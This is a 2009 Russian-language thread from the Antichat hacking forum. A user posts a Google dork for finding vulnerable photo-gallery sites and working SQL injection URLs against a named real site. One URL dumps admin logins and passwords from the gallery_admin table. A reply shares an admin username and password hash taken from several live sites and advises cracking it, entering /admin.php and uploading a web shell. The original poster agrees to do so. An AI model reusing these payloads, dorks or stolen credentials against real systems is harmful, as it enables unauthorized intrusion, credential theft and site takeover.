Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
17.02.2009, 22:47
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
foto_pr.php (Уязвимость)
Начну с того что сайты с уязвимостями ищу через гулевский allinurl:
Тут недавно наткнулся на сайт фото галереи http://pix.in.ua/foto_pr.php?id=-16%20union%20select%201,2,3,4,5,6,7,version()-- и сделал скулю..
Но факт в том что при запросе в гугле
allinurl: foto_pr.php вылазет много сайтов с одной и той же уязвимостью..
foto_pr.php?id=-16+union%20select+1,2,3,4,5,6,7,concat_ws(0x3a,id, name,login,pass) from gallery_admin--
Вопрос. Че это за движек такой..? =)
Последний раз редактировалось Assembler; 17.02.2009 в 22:53..
|
|
|
17.02.2009, 23:23
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Много сайтов гугл выдаёт по запросу
allinurl: com_content 
А в твоём случае их 9 штук .Это самопис какой-то ИМХО
ЗЫ Была где-то тема "помогите определить движок", но видимо при последнем сбое она пропала , я не нашол во всяком случае  |
|
|
|
17.02.2009, 23:28
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Assembler, без названия. просто движок.. он, как видишь не так популярен.
|
|
|
|
17.02.2009, 23:37
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Мб будет каданить =))
|
|
|
|
17.02.2009, 23:57
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:
Код:
bolt:f07ad2552c86bfd4d2396c0114f785ea
Побрутил немножко - сбручиваться оно не захотело, по этому положил прям таки логин)) на этот хеш.
Если очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы. |
|
|
|
18.02.2009, 00:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
http://www.google.ru/search?hl=ru&q=f07ad2552c86bfd4d2396c0114f785ea&bt nG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%B2+Google&lr =&aq=f&oq=
мм, а хэш знаменит.
|
|
|
|
18.02.2009, 00:02
|
|
Участник форума
Регистрация: 01.09.2007
Сообщений: 203
Провел на форуме:
812964
Репутация:
302
|
|
Сообщение от Grey
Двиг самописный - открыл сайта 3-4 из того что выдал гугл на всех одна и та же пара логин-хеш:
Код:
bolt:f07ad2552c86bfd4d2396c0114f785ea
Побрутил немножко - сбручиваться оно не захотело, по этому положил прям таки логин)) на этот хеш.
Если очень интересно, то бруть хеш, попадай в админку (/admin.php), заливай шелл и изучай сорцы. Оке, так и сделаю =)
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
